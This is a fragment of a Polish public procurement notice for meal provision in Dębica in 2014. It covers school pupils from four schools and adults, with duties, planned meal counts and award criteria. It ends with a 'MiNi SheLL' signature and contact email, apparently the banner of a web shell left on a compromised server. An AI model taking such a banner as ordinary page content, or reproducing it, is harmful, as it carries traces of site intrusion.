<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dożywianie młodzieży szkolnej ze szkół I LO, II LO, ZS Nr 2, ZS Nr 4 w Dębicy, zwanej dalej Korzystającym w siedzibie Wykonawcy na terenie miasta Dębica..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do:
1.Wykonania i wydania gorących posiłków - obiadów jednodaniowych (drugie danie), w siedzibie Wykonawcy w oparciu o przykładowy jadłospis będący załącznikiem nr 6, dla uczniów Korzystającego, zakwalifikowanych decyzją wydaną przez Zamawiającego w okresie od 1 września 2014 roku do 26 czerwca 2015 roku, w ilościach i w godzinach ustalonych każdego dnia przez Korzystającego tj. osoby wyznaczone przez szkołę, przez 5 dni w tygodniu (od poniedziałku do piątku), wyłączając dni wolne od nauki
2.Wydawania posiłków Korzystającemu w siedzibie Wykonawcy na terenie miasta Dębica, w miejscu dla niepalących i nie spożywających alkohol, przy zachowaniu odpowiednich warunków higieniczno-sanitarnych zgodnie z obowiązującymi przepisami Ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia. (t. j. z 2010r. Dz. U. Nr 136, poz. 914 ze zm.)
3.Zapewnienia odpowiedniego miejsca do konsumowania posiłku tj. stolik i miejsce siedzące.
4.Zapewnienia wydawania jednakowych posiłków pod względem ilościowym i jakościowym, z wyjątkiem posiłków w ramach diety. W przypadku diety Wykonawca zobowiązany jest wykonać posiłek zgodnie z wymaganą dietą nie zmieniając oferowanej ceny.
5.Nie zamieniania posiłków na środki pieniężne lub niepieniężne czy suchy prowiant.
6.Odpowiedzialności za zgodność jakości gorącego posiłku z obowiązującymi w kraju normami Instytutu Żywności i Żywienia.
7.Przygotowywania posiłków w sposób zróżnicowany (każdego dnia jest inny posiłek) z pełnowartościowych produktów, zgodnie z zasadami racjonalnego żywienia i muszą odpowiadać jakościowo, ilościowo, wagowo i pod względem kaloryczności przykładowemu jadłospisowi przez cały okres realizacji zamówienia.
8.Dostarczania Zamawiającemu i Korzystającemu tygodniowych jadłospisów do piątku każdego tygodnia, które będą obowiązywały od początku kolejnego tygodnia.
9.Przechowania próbek wykonanych posiłków do celów sanitarno-epidemiologicznych zgodnie z obowiązującymi przepisami.
10.Zobowiązania się do zachowania w poufności danych osobowych podopiecznych Zamawiającego.
11.Nie stosowania praktyk dyskryminujących wobec osób korzystających z posiłków, wobec osób korzystających z posiłków finansowanych przez Zamawiającego.
12.Umożliwienia kontroli realizacji umowy na żądanie Zamawiającego.
13.Rozliczenia z ilości wydanych posiłków na podstawie miesięcznej faktury lub rachunku, do dnia 5-go każdego miesiąca. 
14.Zamawiający zobowiązuje się zapłacić Wykonawcy ustaloną cenę, za faktycznie zamówioną i wydaną liczbę posiłków.
15.Wykonawca może w cz. III złożyć ofertę na jedną szkołę i/lub dwie szkoły i/lub trzy szkoły lub wszystkie szkoły. 
16.Zamawiający zastrzega, że liczba korzystających z posiłków może być w każdym miesiącu inna, w zależności od liczby zgłoszeń, może ulegać zmianie, także w sytuacjach, których nie będzie można przewidzieć np. choroba ucznia.

Nazwa i adres Korzystającego	                                     Planowana liczba posiłków 
I Liceum Ogólnokształcące w Dębicy ul. Słowackiego 9 w Dębicy	     2x187dni=374
II Liceum Ogólnokształcące ul. Sportowa 24 w Dębicy	                    4 x187dni=748
Zespół. Szkół Nr 2 ul. I. Lisa 2 w Dębicy	                                 9 x187dni=1 683
Zespół Szkół Nr 4 ul. Strumskiego 1 w Dębicy	                          6 x187dni=1 122.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dożywianie dorosłych w siedzibie Wykonawcy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do:
1.Sporządzenia i wydania gorących jednodaniowych posiłków (zupa z wkładką, drugie danie) w siedzibie Wykonawcy, na terenie miasta Dębica, w okresie od 1 września 2014 roku do 31 sierpnia 2015 roku, dla osób zakwalifikowanych decyzją wydaną przez Zamawiającego w ilościach ustalonych przez Zamawiającego (wykaz osób zakwalifikowanych do dożywiania będzie przedstawiany przez Zamawiającego na początku każdego miesiąca. Wykaz będzie zawierał: imię, nazwisko, adres, liczbę posiłków), przez 5 dni w tygodniu (od poniedziałku do piątku). 
2.Zapewnienia osobom do wydawania jednakowych posiłków pod względem ilościowym i jakościowym, w oparciu o przykładowy jadłospis, będący załącznikiem nr 6, z wyjątkiem posiłków w ramach diety. W przypadku diety Wykonawca zobowiązany jest wykonać posiłek zgodnie z wymaganą dietą, nie zmieniając oferowanej ceny.
3.Wydawania posiłków przy zachowaniu odpowiednich warunków higieniczno-sanitarnych zgodnie z obowiązującymi przepisami prawa Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia. (t. j. z 2010r. Dz. U. Nr 136, poz. 914 ze zm.).
4.Zapewnienia odpowiedniego miejsca do konsumowania tj.: stolik i miejsce siedzące.
5.Dostarczania Zamawiającemu tygodniowych jadłospisów do piątku każdego tygodnia, które będą obowiązywały od poniedziałku kolejnego tygodnia. 
6.Odpowiedzialności za zgodność jakości gorącego posiłku z obowiązującymi w kraju normami Instytutu Żywności i Żywienia.
7.Przygotowywania posiłków w sposób zróżnicowany (każdego dnia jest inny) z pełnowartościowych produktów zgodnie z zasadami racjonalnego żywienia i muszą odpowiadać jakościowo, ilościowo, wagowo i pod względem kaloryczności przykładowemu jadłospisowi przez cały okres realizacji zamówienia.
8.Przechowania próbek wykonanych posiłków do celów sanitarno-epidemiologicznych zgodnie z obowiązującymi przepisami.
9.Zachowania w poufności danych osobowych podopiecznych Zamawiającego.
10.Nie stosowania praktyk dyskryminujących wobec osób korzystających z posiłków, finansowanych przez Zamawiającego.
11.Nie zamieniania posiłków na środki pieniężne lub niepieniężne czy suchy prowiant.
12.Nie wydawania alkoholu bądź innych używek. 
13.Umożliwienia kontroli realizacji umowy na żądanie Zamawiającego.
14.W wyjątkowych sytuacjach posiłek może być wyniesiony na zewnątrz w pojemnikach jednorazowych, jednakże po ustaleniu tego faktu z Zamawiającym. Cena takiego posiłku nie ulega zmianie.
15.Wykonawca zobowiązuje się do dnia 5-go każdego miesiąca przedłożyć Zamawiającemu listę z dożywiania osób tj. liczbę osób korzystających z dożywiania w danym miesiącu, ilości dni w miesiącu, w którym sporządzono posiłki oraz kalkulację kosztu jednego posiłku.
16.Zamawiający zobowiązuje się zapłacić Wykonawcy ustaloną cenę, za faktycznie zamówioną i wydaną liczbę posiłków.
17.Zamawiający zastrzega, że liczba korzystających z posiłków może być w każdym miesiącu inna, w zależności od liczby zgłoszeń i sytuacji, których nie mógł przewidzieć.
Rodzaj posiłku                                                           Planowana liczba posiłków 
Wykonanie 1 gorącego posiłku jednodaniowego 
(zupa z mięsną wkładką)                                                          5x252dni=1 260
Wykonanie 1 gorącego posiłku jednodaniowego drugie danie	            2 x252dni=504.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com